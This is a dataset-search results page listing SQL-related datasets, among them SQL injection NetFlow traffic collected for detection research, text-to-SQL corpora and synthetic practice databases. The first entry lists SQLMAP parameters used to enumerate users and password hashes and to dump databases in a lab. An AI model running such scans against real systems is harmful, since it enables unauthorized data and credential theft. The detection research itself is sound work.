41 datasets found
  1. Z

    Data from: SQL Injection Attack Netflow

    • data.niaid.nih.gov
    • portalcienciaytecnologia.jcyl.es
    • +3more
    Updated Sep 28, 2022
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Ignacio Crespo; Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251
    Explore at:
    Dataset updated
    Sep 28, 2022
    Authors
    Ignacio Crespo; Adrián Campazas
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Introduction

    This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.

    NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

    Datasets

    The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).

    The datasets contain both benign and malicious traffic. All collected datasets are balanced.

    The version of NetFlow used to build the datasets is 5.

        Dataset
        Aim
        Samples
        Benign-malicious
        traffic ratio
    
    
    
    
        D1
        Training
        400,003
        50%
    
    
        D2
        Test
        57,239
        50%
    

    Infrastructure and implementation

    Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

    DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)

    Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).

    The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.

    The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.

        Parameters
        Description
    
    
    
    
        '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
        Enumerate users, password hashes, privileges, roles, databases, tables and columns
    
    
        --level=5
        Increase the probability of a false positive identification
    
    
        --risk=3
        Increase the probability of extracting data
    
    
        --random-agent
        Select the User-Agent randomly
    
    
        --batch
        Never ask for user input, use the default behavior
    
    
        --answers="follow=Y"
        Predefined answers to yes
    

    Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

    The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

    However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

    To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

  2. h

    SQL-GENERATOR-DATASETS

    • huggingface.co
    Updated Dec 2, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    FRANKLIN (2024). SQL-GENERATOR-DATASETS [Dataset]. https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS
    Explore at:
    Dataset updated
    Dec 2, 2024
    Authors
    FRANKLIN
    License

    https://choosealicense.com/licenses/other/https://choosealicense.com/licenses/other/

    Description

    view code : https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing

      Example :
    
    
    
    
    
      {"messages": [
    
    
    
    
    
      {"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."}
    
    
    
    
    
      {"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks… See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
    
  3. Bike Warehouse SQL Project

    • kaggle.com
    Updated Jan 13, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Safae Ahb (2025). Bike Warehouse SQL Project [Dataset]. https://www.kaggle.com/datasets/safaeahb/bike-warehouse-sql-project
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Jan 13, 2025
    Dataset provided by
    Kagglehttp://kaggle.com/
    Authors
    Safae Ahb
    License

    Apache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
    License information was derived automatically

    Description

    SAP Bikes Sales : SQL Project

    https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fdd8e395e5d70bde9279f0f653b4bc2bf%2FGemini_Generated_Image_cvz71ncvz71ncvz7.jpg?generation=1736783649344014&alt=media" alt=""> This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.

    Overview

    The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.

    Key SQL Operations:

    1.**Data Cleaning & Transformation**: - Remove duplicate records from key tables. - Drop unnecessary columns and handle null values. - Populate new columns based on existing data. - Merge related tables to create new insights. 2.**Business Insights Queries**: - Top-selling Products: Identify products with the highest sales quantities and total revenue. - Sales Performance by Product Category: Analyze revenue and order counts by product category. - Employee Sales Performance: Track employees' contribution to sales volumes and revenue. - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value. - Sales Trends: Analyze sales trends over time and calculate average order values.

    Tables Involved

    • Addresses: Contains information about addresses: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2F1a5b39b4f402dfce31ea25d6d53c2f38%2FAdresses%20Table.PNG?generation=1736780543250265&alt=media" alt="">
    • BusinessPartners: Contains details about business partners: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2F416a9be40526650a4167dfdc565dfbe6%2FBusinessPartners%20Table.PNG?generation=1736780656503685&alt=media" alt="">
    • Employees: Contains employee information: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2F5b99849bde2bc052cc1d6cc7d52fb67d%2FEmployees%20Table.PNG?generation=1736780677194831&alt=media" alt="">
    • ProductCategories & ProductCategoryText: Describe product categories and their descriptions: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2F928f9aeb937c2fdc8d8860cc8d23f9d7%2FProductCategories%20Table.PNG?generation=1736780784495223&alt=media" alt=""> https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fe148078e53777ca1180c5adf6cec7dda%2FProductCategory%20Text%20Table.PNG?generation=1736780831995071&alt=media" alt="">
    • Products & ProductTexts: Contain product details and product descriptions: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fdd4eb334332ec5d9248ccb8b737dd2df%2FProducts%20Table.PNG?generation=1736780894684724&alt=media" alt=""> https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Faceb93b69951b1fde1f46bac146a9aa0%2FProductTexts%20Table.PNG?generation=1736782044055973&alt=media" alt="">
    • SalesOrderItems: Contains details of individual items within a sales order: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fe0ba42ddc00634ce1728e013dbeb231c%2FSalesOrderItemsTable.PNG?generation=1736781074515668&alt=media" alt="">
    • SalesOrders: Contains information about sales orders: https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2F0a67d6ba6ded143676db9f0b4f4dfcb0%2FSalesOrders%20Table.PNG?generation=1736781089531236&alt=media" alt="">

    Key SQL Queries

    1. Data Cleaning and Transformation:

    -**Addresses Table**: -Checking for duplicates ADDRESSID. -**BusinessPartners Table**: -Handled duplicates, missing or incorrect data. -Dropped the unnecessary FAXNUMBER column because it was empty. -**Employee Table**: -Dropped unnecessary columns. -Populated NAME_INITIALS based on employee's first, middle, and last name initials. -Fixed column type issues. -**Product Categories and Product Texts**: -Merged ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easy analysis. -**Products Table**: -Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc. -**Sales Order Items Table**: -Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume.

    ###2. Database Diagram and Relationships In addition to the data cleaning and analysis, a database diagram has been create...

  4. ⚙️ SQL Tutorial Exercise Data

    • kaggle.com
    zip
    Updated Oct 2, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    mexwell (2023). ⚙️ SQL Tutorial Exercise Data [Dataset]. https://www.kaggle.com/datasets/mexwell/sql-tutorial-exercise-data
    Explore at:
    zip(3701453 bytes)Available download formats
    Dataset updated
    Oct 2, 2023
    Authors
    mexwell
    Description

    This dataset was created to be the base of the data.world SQL tutorial exercises. Data was genererated using Synthea, a synthetic patient generator that models the medical history of synthetic patients. Their mission is to output high-quality synthetic, realistic but not real, patient data and associated health records covering every aspect of healthcare. The resulting data is free from cost, privacy, and security restrictions, enabling research with Health IT data that is otherwise legally or practically unavailable. De-identified real data still presents a challenge in the medical field because there are peopel who excel at re-identification of these data. For that reason the average medical center, etc. will not share their patient data. Most governmental data is at the hospital level. NHANES data is an exception.

    You can read Synthea's first academic paper here.

    Original Data

    Acknowlegement

    Foto von Rubaitul Azad auf Unsplash

  5. Z

    Stack Overflow Chat Dutch

    • data.niaid.nih.gov
    Updated Jun 20, 2023
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Vanroy, Bram (2023). Stack Overflow Chat Dutch [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_8052379
    Explore at:
    Dataset updated
    Jun 20, 2023
    Authors
    Vanroy, Bram
    License

    http://www.apache.org/licenses/LICENSE-2.0http://www.apache.org/licenses/LICENSE-2.0

    Description

    This dataset contains 56,964 conversations between een AI assistant and a (fake) "Human" (generated) in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.

    Data Instances

    {'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},

    Data Fields

    id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]

    input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].

    topic: the topic description

    Dataset Creation

    Both the translations and the topics were translated with OpenAI's API for gpt-3.5-turbo. max_tokens=1024, temperature=0 as parameters.

    The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):

    CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.

    Here are the requirements that you should adhere to: 1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other; 2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places; 3. ensure accurate translation and keep the correctness of the conversation; 4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias; 5. translate the human's text using informal, but standard, language; 6. make sure to avoid biases (such as gender bias, grammatical bias, social bias); 7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang}; 8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested; 9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.

    Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.

    """

    The prompt to translate the topic is:

    TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
    " summarizing manner. Translate accurately and formally. Do not provide any explanation"
    " about the translation and do not include the original title.

    "

    The system message was:

    You are a helpful assistant that translates English to Dutch to the requirements that are given to you.

    Note that 82 items (0.1%) were not successfully translated. The translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs for the missing items are [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992].

    The translation quality has not been verified. Use at your own risk!

    Licensing Information

    Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.

    This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.

    If you use this dataset, you must also follow the Sharing and Usage policies.

    As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.

    This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.

  6. D

    Database Testing Tool Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated Feb 9, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Archive Market Research (2025). Database Testing Tool Report [Dataset]. https://www.archivemarketresearch.com/reports/database-testing-tool-26309
    Explore at:
    pdf, ppt, docAvailable download formats
    Dataset updated
    Feb 9, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others. The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving the market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to the rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.

  7. WikiSQL (Questions and SQL Queries)

    • kaggle.com
    zip
    Updated Nov 25, 2022
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    The Devastator (2022). WikiSQL (Questions and SQL Queries) [Dataset]. https://www.kaggle.com/datasets/thedevastator/dataset-for-developing-natural-language-interfac
    Explore at:
    zip(21491264 bytes)Available download formats
    Dataset updated
    Nov 25, 2022
    Authors
    The Devastator
    License

    https://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/

    Description

    WikiSQL (Questions and SQL Queries)

    80654 hand-annotated questions and SQL queries on 24241 Wikipedia tables

    By Huggingface Hub [source]

    About this dataset

    A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.

    More Datasets

    For more datasets, click here.

    Featured Notebooks

    • 🚨 Your notebook can be here! 🚨!

    How to use the dataset

    This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same among all splits, and the file contains information on the phase, question, table, and SQL for each interface

    Research Ideas

    • This dataset can be used to develop natural language interfaces for relational databases.
    • This dataset can be used to develop a knowledge base of common SQL queries.
    • This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries

    Acknowledgements

    If you use this dataset in your research, please credit the original authors.

    Data Source

    License

    License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.

    Columns

    File: validation.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    File: train.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    File: test.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    Acknowledgements

    If you use this dataset in your research, please credit the original authors. If you use this dataset in your research, please credit Huggingface Hub.

  8. h

    synthetic_text_to_sql

    • huggingface.co
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Gretel.ai, synthetic_text_to_sql [Dataset]. https://huggingface.co/datasets/gretelai/synthetic_text_to_sql
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset provided by
    Gretel.ai
    License

    Apache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
    License information was derived automatically

    Description

    Image generated by DALL-E. See prompt for more details

      synthetic_text_to_sql
    

    gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:

    105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.

  9. Synthetic E-Commerce Relational Datasets

    • kaggle.com
    Updated Aug 31, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Nael Aqel (2025). Synthetic E-Commerce Relational Datasets [Dataset]. https://www.kaggle.com/datasets/naelaqel/synthetic-e-commerce-relational-dataset
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Aug 31, 2025
    Dataset provided by
    Kagglehttp://kaggle.com/
    Authors
    Nael Aqel
    License

    MIT Licensehttps://opensource.org/licenses/MIT
    License information was derived automatically

    Description

    Synthetic E-Commerce Relational Dataset

    This dataset is synthetically generated fake data designed to simulate a realistic e-commerce environment.

    Purpose

    To provide large-scale relational datasets for practicing database operations, analytics, and testing tools like DuckDB, Pandas, and SQL engines. Ideal for benchmarking, educational projects, and data engineering experiments.

    Entity Relationship Diagram (ERD) - Tables Overview

    1. Customers

    • customer_id (int): Unique identifier for each customer
    • name (string): Customer full name
    • email (string): Customer email address
    • gender (string): Customer gender ('Male', 'Female', 'Other')
    • signup_date (date): Date customer signed up
    • country (string): Customer country of residence

    2. Products

    • product_id (int): Unique identifier for each product
    • product_name (string): Name of the product
    • category (string): Product category (e.g., Electronics, Books)
    • price (float): Price per unit
    • stock_quantity (int): Available stock count
    • brand (string): Product brand name

    3. Orders

    • order_id (int): Unique identifier for each order
    • customer_id (int): ID of the customer who placed the order (foreign key to Customers)
    • order_date (date): Date when order was placed
    • total_amount (float): Total amount for the order
    • payment_method (string): Payment method used (Credit Card, PayPal, etc.)
    • shipping_country (string): Country where the order is shipped

    4. Order Items

    • order_item_id (int): Unique identifier for each order item
    • order_id (int): ID of the order this item belongs to (foreign key to Orders)
    • product_id (int): ID of the product ordered (foreign key to Products)
    • quantity (int): Number of units ordered
    • unit_price (float): Price per unit at order time

    5. Product Reviews

    • review_id (int): Unique identifier for each review
    • product_id (int): ID of the reviewed product (foreign key to Products)
    • customer_id (int): ID of the customer who wrote the review (foreign key to Customers)
    • rating (int): Rating score (1 to 5)
    • review_text (string): Text content of the review
    • review_date (date): Date the review was written

    Visual EDR

    https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F9179978%2F7681afe8fc52a116ff56a2a4e179ad19%2FEDR.png?generation=1754741998037680&alt=media" alt="">

    Notes

    • All data is randomly generated using Python’s Faker library, so it does not reflect any real individuals or companies.
    • The data is provided in both CSV and Parquet formats.
    • The generator script is available in the accompanying GitHub repository for reproducibility and customization.

    Output

    The script saves two folders inside the specified output path:

    csv/    # CSV files
    parquet/  # Parquet files
    

    License

    MIT License

    References

  10. G

    Data Access Auditing Market Research Report 2033

    • growthmarketreports.com
    csv, pdf, pptx
    Updated Sep 1, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Growth Market Reports (2025). Data Access Auditing Market Research Report 2033 [Dataset]. https://growthmarketreports.com/report/data-access-auditing-market
    Explore at:
    pdf, pptx, csvAvailable download formats
    Dataset updated
    Sep 1, 2025
    Dataset authored and provided by
    Growth Market Reports
    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    Data Access Auditing Market Outlook



    According to our latest research, the global Data Access Auditing market size in 2024 is valued at USD 2.18 billion, reflecting robust demand for advanced data governance and compliance solutions across diverse industries. The market is expected to grow at a CAGR of 13.7% from 2025 to 2033, reaching a forecasted value of USD 6.47 billion by 2033. This impressive growth is propelled by increasing regulatory requirements, heightened cybersecurity concerns, and the exponential rise in data generation and consumption worldwide. As per our latest research, organizations are prioritizing data transparency and security, further accelerating the adoption of data access auditing solutions globally.




    The primary growth factor for the Data Access Auditing market is the escalating regulatory landscape that mandates stringent data monitoring and access control. With the proliferation of data privacy laws such as the General Data Protection Regulation (GDPR), California Consumer Privacy Act (CCPA), and the Health Insurance Portability and Accountability Act (HIPAA), organizations across sectors are compelled to implement comprehensive auditing mechanisms. These regulations require enterprises to not only safeguard sensitive data but also maintain detailed logs of data access events for compliance and forensic analysis. Consequently, the need for automated, scalable, and real-time data access auditing solutions has surged, enabling organizations to mitigate risks, avoid hefty penalties, and foster trust among stakeholders.




    Another significant driver for the Data Access Auditing market is the dramatic increase in data breaches and cyberattacks targeting critical business information. As enterprises transition to hybrid and multi-cloud environments, the complexity of managing data access rights and monitoring user activities has intensified. Cybersecurity incidents, including insider threats and unauthorized data exfiltration, are pushing organizations to adopt sophisticated auditing tools capable of providing granular visibility into who accessed what data, when, and from where. These solutions not only help detect suspicious activities in real-time but also support incident response and post-breach investigations, thereby enhancing the overall security posture of organizations.




    The rapid digitization of business processes and the integration of emerging technologies such as artificial intelligence, machine learning, and the Internet of Things (IoT) are further fueling the growth of the Data Access Auditing market. Enterprises are generating and processing massive volumes of structured and unstructured data, necessitating robust auditing frameworks to ensure data integrity and prevent unauthorized access. The convergence of digital transformation initiatives with data-centric business models is compelling organizations to invest in advanced auditing solutions that offer scalability, automation, and seamless integration with existing IT infrastructures. This trend is particularly pronounced in sectors such as financial services, healthcare, and government, where data sensitivity and compliance obligations are paramount.



    In the context of increasing cybersecurity threats and regulatory demands, SQL Query Audit Tools have emerged as vital components in the arsenal of data access auditing solutions. These tools are designed to provide detailed insights into database activities by monitoring and logging SQL queries executed within an organization's database environment. By capturing comprehensive information about who executed a query, what data was accessed, and when the access occurred, SQL Query Audit Tools enable organizations to maintain stringent oversight over their data assets. This capability is crucial for detecting unauthorized access attempts, ensuring compliance with data protection regulations, and supporting forensic investigations in the event of a data breach. As organizations continue to grapple with complex data environments, the integration of SQL Query Audit Tools into broader data governance frameworks is becoming increasingly essential for maintaining robust security postures.




    From a regional perspective, North America dominates the Data Access Auditing market, accounting for the largest revenue share in 2024, driven by the presence of major t

  11. Adventurers of Venturia

    • kaggle.com
    zip
    Updated Nov 11, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Jasium (2025). Adventurers of Venturia [Dataset]. https://www.kaggle.com/datasets/jasium/adventurers-of-venturia
    Explore at:
    zip(2162 bytes)Available download formats
    Dataset updated
    Nov 11, 2025
    Authors
    Jasium
    License

    https://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/

    Description

    A small, fantasy-themed dataset created for learning and practice. It contains 100 adventurers with randomized names, races, classes, kingdoms, levels, and gold amounts for experimenting with SQL and Python.

    SQL Table Creation

    Create table Adventurers(
     id integer primary key,
     name text,
     last_name text,
     race text,
     class text,
     kingdom text,
     level integer,
     gold integer
     );
     
    

    Python Names and Attributes

    import random
    
    names = [
      'Aster', 'Antara',
      'Boldak', 'Balta',
      'Corpik', 'Carnda',
      'Defham', 'Dinsa',
      'Enemaliz', 'Enderna',
      'Fansom', 'Falma',
      'Garol', 'Gerna',
      'Hant', 'Hisa',
      'Isder', 'Isba',
      'Jansos', 'Juna',
      'Kornak', 'Kaira',
      'Lomrik', 'Lysara',
      'Mordak', 'Mina',
      'Nerok', 'Nalia',
      'Orim', 'Ossara',
      'Pendar', 'Pella',
      'Quarn', 'Quila',
      'Rundak', 'Rysa',
      'Sornik', 'Selna',
      'Tarnak', 'Tira',
      'Uldan', 'Ursa',
      'Vornik', 'Vela',
      'Wendak', 'Wira',
      'Xalor', 'Xina',
      'Yorik', 'Ysera',
      'Zandor', 'Zyra'
    ]
    
    last_names = [
      'Ashford', 'Blackwood',
      'Coldmoor', 'Duskbane',
      'Eboncrest', 'Frosthelm',
      'Gloomshade', 'Hawkridge',
      'Ironfist', 'Jadeeye',
      'Keenblade', 'Lightfoot',
      'Moonstrike', 'Nightfall',
      'Oakheart', 'Proudmore',
      'Quickwater', 'Ravenhill',
      'Stormborn', 'Thornfield',
      'Umbermoor', 'Valewind',
      'Windrider', 'Xiloscient',
      'Yewbranch', 'Zephyrine'
    ]
    
    races = ['Human', 'Elf', 'Orc', 'Dwarf']
    
    classes = ['Fighter', 'Ranger', 'Thief', 'Assassin', 'Mage', 'Bard', 'Merchant']
    
    kingdoms = [
      'Ironhold',
      'Silverwood',
      'Bloodfang',
      'Stormwind',
      'Shadowmere',
      'Frostveil',
      'Duskmoor',
      'Emberfall'
    ]
    

    SQL Command Generator

    for i in range (1, 101):
      name = random.choice(names)
      last_name = random.choice(last_names)
      race = random.choice(races)
      _class = random.choice(classes)
      kingdom = random.choice(kingdoms)
      level = random.randint(1, 100)
      gold = random.randint(0, 10000)
    
